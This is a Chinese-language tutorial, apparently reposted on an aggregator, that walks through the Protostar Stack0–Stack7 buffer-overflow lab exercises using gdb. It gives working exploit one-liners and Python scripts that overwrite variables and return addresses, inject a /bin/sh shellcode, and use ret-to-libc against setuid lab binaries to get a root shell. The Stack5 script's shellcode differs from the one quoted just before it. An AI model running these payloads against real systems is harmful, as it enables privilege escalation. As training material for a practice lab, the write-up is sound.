PWN入门&Protostar靶场Stack系列

这篇具有很好参考价值的文章主要介绍了PWN入门&Protostar靶场Stack系列。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Protostar靶场地址

https://exploit.education/protostar/

溢出

源码分析

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;          //定义一个变量
  char buffer[64];           //给buffer变量定义数组,c语言中一个字符数就是一个字符串

  modified = 0;            //modified变量=0
  gets(buffer);             //获取输入,到buffer变量里

  if(modified != 0) {               //如果modified不等于0
      printf("you have changed the 'modified' variable\n");   
  } else {                        
      printf("Try again?\n");     
  }
}

分析源码可以看见第8行,定义的字符串数组是64位。按照溢出的思路,我们应该是需要加一位字符串,也就是64位,这样子就可以溢出了。
而且通过11行可以看见,gets函数如果将继续存储字符当超过缓冲区的末端,将会影响计算机的安全。这是一个危险的函数

python -c 'print "B"*65'|./stack0

使用python输出字符串,或者echo输出,可以看见成功破解成勋
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

汇编分析

gdb调试

使用gdb调试程序

gdb stack0
set disassembly-flavor intel 参数让汇报代码美观一点
disassemble main  显示所有的汇编程序指令

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
这里主要看第8行和第9行,第8行执行了gets函数,第9行:这行汇编指令表示将存储在%esp寄存器值加上0x5c偏移处的内容(内存地址)加载到%eax寄存器中。%esp是堆栈指针寄存器,通常用于指向栈顶,而%eax是通用寄存器,用于存储数据和地址。

0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp
0x080483f7 <main+3>:    and    $0xfffffff0,%esp
0x080483fa <main+6>:    sub    $0x60,%esp
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:   lea    0x1c(%esp),%eax
0x08048409 <main+21>:   mov    %eax,(%esp)
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    0x5c(%esp),%eax
0x08048415 <main+33>:   test   %eax,%eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   movl   $0x8048500,(%esp)
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   movl   $0x8048529,(%esp)
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

对这两行地址进行断点调试

b *0x0804840c
b *0x08048411

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
然后输入这个命令:

define hook-stop

这个工具可以帮助我们在每一步操作停下来后,自动的运行我们设置的命令:

info registers   //显示寄存器里的地址
x/24wx $esp      //显示esp寄存器里的内容
x/2i $eip        //显示eip寄存器里的内容
end              //结束

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
输入r运行第一个断点
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
输入n命令,执行下一步。下一步是gets函数
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
通过观察可以发现, 当0x41414141填满到0x00000000的时候, 从当前的0x41414141往下输出 。 刚好输出到到0x00000000的时候,有四行164+1个A就可以溢出了,刚好也是65位字符。(其中一个字节有8位,然后4个A就刚好8位,而一行有4个字节,所以一行的字符串数位44=16,4行也就是4*16了)
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
经过测试,可以看见确实是这样子
继续下一步n执行,可以看见程序最终破解成功。
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
至于为什么是到 0x00000000

x/wx $esp+0x5c            //查看esp地址+0x5c偏移地址的内容

查看内存中以esp寄存器为起点加上偏移量0x5c的地址的内容。在汇编层面,esp通常是栈指针,偏移量代表相对于栈顶的位置。使用x命令表示检查内存内容,wx表示以十六进制方式显示字的格式。
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

更改eip寄存器的值

什么eip寄存器

总的来说eip存储了下一条即将被执行的机器指令的内存地址,这个寄存器在执行指令时告诉 CPU 下一步应该执行哪条指令

破解程序

设置断点,其他断点都可以,我们主要是看eip的值

b main //函数名设置断点
b *main //指定main函数的地址设置断点

我们可以查看程序头,运行程序到断点处

r
info registers //查看所有寄存器的值

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
显示程序中main函数的反汇编代码

disassemble main

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
可以看见如果我们输入的值和程序不一样,就会跳转到0x8048427这个地址。如果我们的eip值跳转到0x08048419地址,就会执行下面的put函数,意味着破解成功

set $eip=0x08048419 //设置eip寄存器的地址
n // 执行下一条指令

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
最后可以看见程序直接破解成功了

修改eax寄存器的值

什么是eax寄存器

它主要用于存储函数返回值、算术运算的临时数据和通用数据等。在函数调用过程中,eax 通常用于存储函数的返回值。

破解程序

显示程序中main函数的反汇编代码,可以知道0x08048415地址,是进行比较判断的值
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
查看源代码,可以看见不为0的时候,就会执行下一个条件
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
现在我们来调试这个地址的断点

b *0x08048415 //对这个地址进行断点
r //开始调试程序的断点
info registers //显示寄存器的所有信息

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
修改eax寄存器的值为1

set $eax = 1

继续执行n下一步指令,可以看见程序破解成功。
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

x86架构

x86的读取,读取主要是由低到高的
题目来源:

https://exploit.education/protostar/stack-one/

源码

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

从第6行到13行可以看见,启动程序必须后面有一些输入出,才能载入。后面的代码和前面的其实差不多。
这里我们主要是要指定x86架构的一个知识点,就是我们已经知道了,如果要想破解程序。那就必须让modified变量等于0x61626364这个十六进制。
好,现在让我们尝试一遍,之前的溢出方式。
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

define hook-stop //启动程序的时候,会自动显示下面那些设置
x/48wx $esp //显示48个十六进制,esp寄存器的内容
x/2i $eip //显示下两条的eip存储的指令

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
然后指定要断点的地址

b *0x080484ab

启动程序

r AAAAAAAA

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
通过查看esp地址+0x5c偏移地址的内容,我们知道了需要64位才能缓冲区溢出

x/wx $esp+0x5c

几乎和挑战1方法一样。
0x61626364的十六进制是abcd
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
所以,第一个没成功,是因为读取是由低高的
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

环境变量溢出

题目来源

https://exploit.education/protostar/stack-two/

源代码

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

方法没变,只是溢出的方式奇怪了,是环境变量。getenv函数是获取当前的环境变量。源代码中,获取的是GREENIE环境变量的路径。
溢出方式:

export GREENIE=$(python -c"print 'A'*64+'\x0a\x0d\x0a\
x0d'"); ./stack2

可以看见破解程序成功
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

函数地址溢出

https://exploit.education/protostar/stack-three/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

从源代码中的第六行和到第九行可以看见是自定义的win函数,如果调用win函数,则程序破解成功。

void win()
{
  printf("code flow successfully changed\n");
}
  • 第一行argc 表示命令行参数的数量,argv 是一个指向字符串数组的指针,这些字符串是命令行传递给程序的参数。
  • 第二行声明了一个指向函数的指针 fp。volatile 关键字告诉编译器这个变量的值可能会以编译器不可预知的方式改变,因此在优化时需要特别小心处理这个变量。这个指针被设定为指向返回 int 类型的函数。
  • 我们可以看见第六行的fp指针设置为0,也就是意味着,是空指针,不会跳转任何地址
int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

指针变量

指针变量是一种特殊类型的变量,其存储的是另一个变量的内存地址,而不是数据值本身。
下面是指针变量的一些常见特点:

  • 存储地址:指针变量存储的是另一个变量的地址,而不是直接存储数据。
  • 数据类型:每个指针都有一个特定的数据类型,这表明了指针指向的变量类型。例如,int * 是指向整型变量的指针,char * 是指向字符变量的指针。
  • 间接引用:通过指针,我们可以间接地访问或修改其指向地址上的数据。这称为“解引用”。
  • 动态内存分配:在C和C++中,指针经常用于动态内存分配。
  • 数组和指针:指针和数组在C语言中紧密相关。数组名本身就是一个指向数组第一个元素的指针。
  • 指针运算:可以对指针进行某些类型的算术运算,例如增加或减少指针的值,这样它们就可以指向内存中的下一个或上一个位置。
  • 空指针:指针可以被设置为 NULL 或 nullptr(在C++11及以后),表示它不指向任何地址。
  • 指针的指针:你甚至可以有指向另一个指针的指针,这被称为多级指针,如 int ** 是一个指向 int * 类型的指针。

溢出

当fp等于一个有效的函数指针时,会进行输出,并跳转到fp所指向的函数。

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

因为fp在代码中已经设置为0了,如果要想进行改变的话,就要通过溢出64位,才能进行操控指针变量。

gdb调试

查看main函数,这两行是我们需要溢出的地方,因为call指令执行eax寄存器里的值,我们需要将win函数溢出覆盖到0x08048471的地址就好了
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
如果不溢出,可以看见程序直接跳转指定的输出了
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
添加垃圾数据溢出到够64位就好了
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

溢出加函数覆盖

查看win函数地址可以在gdb指令使用,第一行地址就是了

disassemble win

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
或者

objdump -x ./stack3 |grep win

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
溢出数据+覆盖的函数地址

python -c "print('A'*64+'\x24\x84\x04\x08')"| ./stack3

可以看见破解成功
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

leave和ret指令

leave 和 ret 是 x86 汇编语言中的两个指令,通常在函数的退出过程中使用。

leave 指令

leave 指令用于将栈帧恢复到调用函数之前的状态。它的作用相当于两个指令的组合:mov esp, ebp 和 pop ebp。

ret 指令

ret 指令用于返回地址函数

题目地址:

https://exploit.education/protostar/stack-four/

源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

可以看见,我们虽然可以通过第13行进行64位的溢出,但是,我们需要调用win函数的地址,才能破解程序。那么这里就需要用到ret指令的特性,通过溢出,来修改ret指令返回的地址为win函数地址。

set disassembly-flavor intel
disassemble main

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
对leave指令地址进行断点
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
可以看见刚开始运行的程序,是这样子的,记录下来
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
准备到ret指令运行了,n下一步调试
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
在这里我们知道了,ret指令的地址是0xb7eadc76,我们要对它进行溢出覆盖为我们想要破解的win函数地址。

溢出覆盖

重新断掉调试,按r
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
可以计算出,需要76+win函数地址才能溢出覆盖。

python -c "print('A'*76+'win函数地址')"|./stack4

win函数地址获取,可以看见是0x080483f4
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
最后破解程序

python -c "print('A'*76+'\xf4\x83\x04\x08')"|./stack4

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

写入shellcode

题目地址

https://exploit.education/protostar/stack-five/

源码分析

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

可以看见这个程序的作用是只接受我们的输入

栈&esp寄存器

ESP 是 x86 架构中的一个寄存器,全称是 “Extended Stack Pointer”,它是栈指针寄存器。ESP 用于指向栈的顶部,即栈中最新压入的数据的位置。
在栈溢出攻击中,攻击者可能会尝试通过修改 ESP 或覆盖返回地址,来劫持程序的控制流,使其执行攻击者注入的代码。

setuid位

只要权限位有s,意味着执行这个程序的时候是root权限
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

ret指令溢出+堆栈shellcode写入

破解思路

因为esp寄存器控制着数据,所以我们的最终目的,是溢出加上写入恶意代码获得/bin/bash的root权限。因为有setuid位,所以可以得到root权限。

shellcode

这是一个linux x86架构执行/bin/sh的shellcode,来源于:

http://shell-storm.org/shellcode/files/shellcode-811.html

shellcode:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

破解

通过断点调试,获得ret指令地址,可以看见继续按n下一步,就可以获得ret的地址了
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
按n,可以看见ret的地址是:0xb7eadc76。同时它也是我们需要溢出的地址。同时esp寄存器的0xbffff7d0地址是我们需要进行堆栈写入的地方。
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

0xbffff7d0 实际上是栈上的地址,通常对应于栈指针 esp 的值。在这个场景中,这个地址可能被用来覆盖函数返回地址 eip。
攻击者通常希望将 eip 的值修改为指向攻击者注入的代码的地址,从而在函数返回时跳转到攻击者指定的代码区域。
这种类型的攻击通常称为栈溢出攻击,其中溢出的数据会覆盖栈上的关键信息,如返回地址。
所以,在这个代码中,0xbffff7d0 作为填充和攻击代码之间的位置,可能用于达到覆盖返回地址的目的。

现在我们知道了,ret溢出的地址,我们重新断掉调试一下。用gdb调试leave的地址:

disassemble main
b *0x080483d9
r
x/100wx $esp

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
通过计算,可以知道要想溢出445-4个地址位,也就是需要76个字符,才能溢出ret地址。然后进行覆盖地址。

脚本编写

import struct

overflow = "A" * 76
eip = struct.pack("I",0xbffff7d0)
nop = "\x90"*10
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x88"

print overflow+eip+nop+shellcode
  • 第三行是,溢出ret返回地址。第四行eip变量,是用二进制数据写入堆栈esp地址到ret的返回地址。
  • 第5行,nop意味着空变量,不进行任何操作。不改变计算机的任何操作和值。
  • 第6行是shellcode,linux x86架构执行/bin/sh的shellcode
  • 总的来说是,溢出地址后,覆盖了地址是堆栈的地址(因为它可以控制数据)。最后在配合空变量还有shellcode一起执行,成功获得root的权限
(python stack5exp.py ; cat)| /opt/protostar/bin/stack5

其中括号是为了保存临时的全部输出,最后让输入到stack5程序中。
cat的特性,如图:直接输入cat回车,然后随便打可以看见都是我们自己输入的输出
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
最后可以看见获取到了root权限,成功破解

ret to libc

“ret to libc”,其中是为了溢出ret地址从而进行覆盖为libc库中某个函数的地址,比如”system“函数可以用来执行系统命令。我们可以通过这个函数,构造一个恶意的参数给它,从而获取shell。

libc库

程序为了调用函数,就会到指定的libc库里查找并执行
题目:

https://exploit.education/protostar/stack-six/

stack6源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()   //定义一个名为getpath的函数
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);  //输出字符串input path please: 

  gets(buffer);  //获取用户输入,将输入存储到buffer函数变量里

  ret = __builtin_return_address(0);   //获取ret返回的内存地址

  if((ret & 0xbf000000) == 0xbf000000) {   //如果内存地址的前两位是0xbf
    printf("bzzzt (%p)\n", ret);  //输出bzzzt
    _exit(1);
  }

  printf("got path %s\n", buffer);  //输出got path和用户的输入
}

int main(int argc, char **argv)  //主函数
{
  getpath();  //调用getpath函数
}

破解思路

由于程序的主要调用的函数是getpath,用gdb查看getpath函数
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

ret溢出字符位

然后进行断点调试

x/wx ret
x/100wx $esp

可以看见ret指令的地址是0x8048505,这是我们要覆盖的。通过计算可以,知道要覆盖ret指令的返回地址需要,80个字符位
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

获取system函数地址

继续输入gdb指令,获取system的函数地址,可以看见是 0xb7ecffb0。获取system函数地址是为了可以执行命令,所以需要它

p system

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

程序调用恶意字符串的完整地址

虽然我们我们有了system函数地址,但是我们还需要构造恶意的参数传入到system函数中。
查找程序内存映射(内存映射用于将文件或其他设备的内容映射到进程的地址空间),从而找到stack6的基地址:0xb7e97000

i proc mappings

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
现在我们已知 0xb7e97000 libc库基地址,如果想要调用licb库中的函数、参数什么的。就必须调用程序字符串的完整地址,其中它:
程序调用字符串的完整地址 = libc库基地址+字符串的偏移地址

strings -t d /lib/libc-2.11.2.so|grep "/bin/sh"

查找我们所需字符串的偏移地址 :1176511 ,有了它才能获取shell
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
可以知道程序调用字符串的完整地址是 0xb7e97000+1176511

exp脚本编写

import struct

ret_overflow = "A"*80
system = struct.pack("I",0xb7ecffb0)
system_ret = "A"*4
shellcode = struct.pack("I",0xb7e97000+1176511)
print ret_overflow+system+system_ret+shellcode
  1. ret_overflow 是 ret溢出字符位
  2. system变量是,利用pack模块二进制写入system函数的地址
  3. system_ret变量,由于调用system函数会有ret的返回值,这里我们自己创造一个。至于为什么要4个字符A,是为了满足地址的十六进制。
  4. shellcode变量则是,要传入到system函数的参数字符串。用二进制将地址写入进去

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
最后破解程序

(python stack6exp.py ; cat)|/opt/protostar/bin/stack6

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

寻找ret地址

题目地址:

https://exploit.education/protostar/stack-seven/

源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

和stack-six代码的区别:

char *getpath()
{
  // ...
  return strdup(buffer);
}

这段代码的 getpath 函数的返回类型是 char *,即返回一个字符指针。,函数从用户输入中获取路径,并使用 strdup 函数创建了路径的副本,最后返回这个副本。

破解

正因为有了副本,只不过,我们需要添加ret指令的地址,有了ret才能返回我们所需要执行的恶意函数。首先我们的解题思路还是溢出:ret To libc。

objdump寻找ret指令的地址

寻找指令的十六进制地址

objdump -D ./stack7 |grep ret

随便选一个ret指令地址都可以
PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全

exp

溢出位+ret指令地址+system函数地址+system_ret返回地址+shellcode地址

import struct

ret_overflow = "A"*80
ret_addr = struct.pack("I",0x8048383)
system = struct.pack("I",0xb7ecffb0)
system_ret = "A"*4
shellcode = struct.pack("I",0xb7e97000+1176511)
print ret_overflow+ret_addr+system+system_ret+shellcode

可以看见破解成功

(python stack7exp.py ; cat) | /opt/protostar/bin/stack7

PWN入门&Protostar靶场Stack系列,PWN,pwn,ctf,gdb,网络安全
参考文章:文章来源地址https://www.toymoban.com/news/detail-823701.html

https://blog.csdn.net/qq_45894840/article/details/129490504
https://blog.csdn.net/qq_45894840/article/details/132688653
https://blog.csdn.net/qq_45894840/article/details/132720953
https://blog.csdn.net/qq_45894840/article/details/134028680

到了这里,关于PWN入门&Protostar靶场Stack系列的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 攻防世界_PWN_stack2

    本文通过结合其他师傅的思路以及自己的一些理解完成。希望在记录自己所学知识的同时能够帮助有同样疑惑的人。pwn入门新手一个,如果有说错的地方请师傅们多多包涵 本题关键汇编指令:mov指令和lea指令以及ret指令 mov mov指令的功能是传送数据,它可以把一个操作数的值复

    2024年02月07日
    浏览(39)
  • CTF-pwn pwntools用法探索

    相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是 from pwn import * 。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗? 本文从pwntools官方文档入手

    2024年02月05日
    浏览(47)
  • 【PWN · Stack Smash】[2021 鹤城杯]easyecho

    花式栈溢出——Canary保护是吧?接化发,拿来吧你 目录 前言 一、代码分析 0.保护 1.main函数 2.sub_CF0()函数 (v9指向的函数) 二、Stack Smash过程 0.原理简述  1.条件与准备 2.地址泄露 ①真实地址泄露 ②flag地址泄露 ③argv[0]地址泄露 3.exp 总结  Canary保护,是在栈上插入一段随机

    2024年02月15日
    浏览(46)
  • 二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO

    pwn是ctf比赛的方向之一,也是门槛最高的,学pwn前需要很多知识,这里建议先去在某宝上买一本汇编语言第四版,看完之后学一下python和c语言,python推荐看油管FreeCodeCamp的教程,c语言也是 pwn题目大部分是破解在远程服务器上运行的二进制文件,利用二进制文件中的漏洞来获

    2024年02月09日
    浏览(38)
  • 二进制安全虚拟机Protostar靶场(2)基础知识讲解,栈溢出覆盖变量 Stack One,Stack Two

    Protostar靶场的安装和一些二进制安全的基础介绍在前文已经介绍过了,这里是文章链接 当系统向缓冲区写入的数据多于它可以容纳的数据时,就会发生缓冲区溢出或缓冲区溢出,用更简单的话说就是在程序运行时,系统会为程序在内存里生成一个固定空间,如果超过了这个空

    2024年02月09日
    浏览(39)
  • 从零开始搭建Ubuntu CTF-pwn环境

    最近因为学校考试所以没怎么看pwn,但是中间虚拟机崩掉过,问题还挺严重。前几天发现能正常打开了,但是一用gdb就会出现下面让人窒息的提醒: 怎么调都不知道是怎么回事,很奇怪的是只有在开gdb的时候才会弹出这个错误,其他都是正常的。问过师傅时候无奈只能放弃这

    2024年01月16日
    浏览(94)
  • GDOU-CTF-2023新生赛Pwn题解与反思

    因为昨天学校那边要进行天梯模拟赛,所以被拉过去了。 16点30分结束,就跑回来宿舍开始写。 第一题和第二题一下子getshell,不用30分钟,可能我没想那么多,对比网上的WP,自己和他们有点不太一样,比较暴力。 大概17点10的时候,写第三题,可能自己第一次遇到随机数问

    2023年04月17日
    浏览(59)
  • CTF-PWN学习-为缺少指导的同学而生

      更新公告:         2023-7-5晚上21:12 已更新,对内容做了些调整。 调整如下:         添加 解题步骤描述          添加 专业名词描述         博主也是个PWN的入门者。PWN的入门不可能是无痛的。能做到的只是减少一点初学者的痛苦。这篇博客会长期维护,也会

    2024年02月07日
    浏览(45)
  • PWN学习之格式化字符串及CTF常见利用手法

    格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。 格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中  printf 、 sprintf 、 fprintf  等函数用于将数据格式化为字符串并进行输出

    2024年02月19日
    浏览(41)
  • CTFshow-pwn入门-前置基础pwn32-pwn34

    FORTIFY_SOURCE(源码增强),这个其实有点类似与Windows中用新版Visual Studio进行开发的时候,当你用一些危险函数比如strcpy、sprintf、strcat,编译器会提示你用xx_s加强版函数。 FORTIFY_SOURCE本质上一种检查和替换机制,对GCC和glibc的一个安全补丁。 目前支持memcpy, memmove, memset, strcpy, s

    2024年02月09日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包